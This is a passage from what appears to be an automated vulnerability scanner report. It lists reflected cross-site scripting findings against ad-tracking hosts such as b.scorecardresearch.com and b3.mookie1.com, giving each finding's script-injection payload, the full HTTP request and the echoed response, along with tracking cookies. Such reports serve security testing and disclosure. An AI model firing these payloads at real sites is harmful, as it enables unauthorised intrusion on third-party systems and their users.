Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:38 2011&prad=58087461&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297650518%2E886%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722("");

3.105. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a8148<script>alert(1)</script>634abd05f4d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a8148<script>alert(1)</script>634abd05f4d&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a8148<script>alert(1)</script>634abd05f4d", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.106. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 1a8b2<script>alert(1)</script>16a0b4321e1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=31476441a8b2<script>alert(1)</script>16a0b4321e1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"31476441a8b2<script>alert(1)</script>16a0b4321e1", c15:"", c16:"", r:""});

3.107. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7aa03<script>alert(1)</script>33d2ba5508b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3147644&c15=7aa03<script>alert(1)</script>33d2ba5508b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3147644", c15:"7aa03<script>alert(1)</script>33d2ba5508b", c16:"", r:""});

3.108. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload efa2b<script>alert(1)</script>b32d71508fc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338efa2b<script>alert(1)</script>b32d71508fc&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338efa2b<script>alert(1)</script>b32d71508fc", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.109. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2bc3f<script>alert(1)</script>8a89c7c3d07 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!2bc3f<script>alert(1)</script>8a89c7c3d07&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!2bc3f<script>alert(1)</script>8a89c7c3d07", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.110. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ecbe3<script>alert(1)</script>19cfb851d89 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!ecbe3<script>alert(1)</script>19cfb851d89&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!ecbe3<script>alert(1)</script>19cfb851d89", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

3.111. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d5698<script>alert(1)</script>41ad9abe9a7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644d5698<script>alert(1)</script>41ad9abe9a7&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644d5698<script>alert(1)</script>41ad9abe9a7", c6:"", c10:"", c15:"", c16:"", r:""});

3.112. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload cd70e<script>alert(1)</script>b6f76d922d1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=cd70e<script>alert(1)</script>b6f76d922d1& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:38 GMT
Date: Mon, 14 Feb 2011 01:26:38 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"cd70e<script>alert(1)</script>b6f76d922d1", c10:"", c15:"", c16:"", r:""});

3.113. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cdc"><script>alert(1)</script>42f29418bd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/115666934/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.114. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e176c"><script>alert(1)</script>ba946806cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/440039318/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.115. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12411"><script>alert(1)</script>948b5d9dd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/1632556584/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.116. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b804e"><script>alert(1)</script>4cb874026ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/844783005/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.117. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

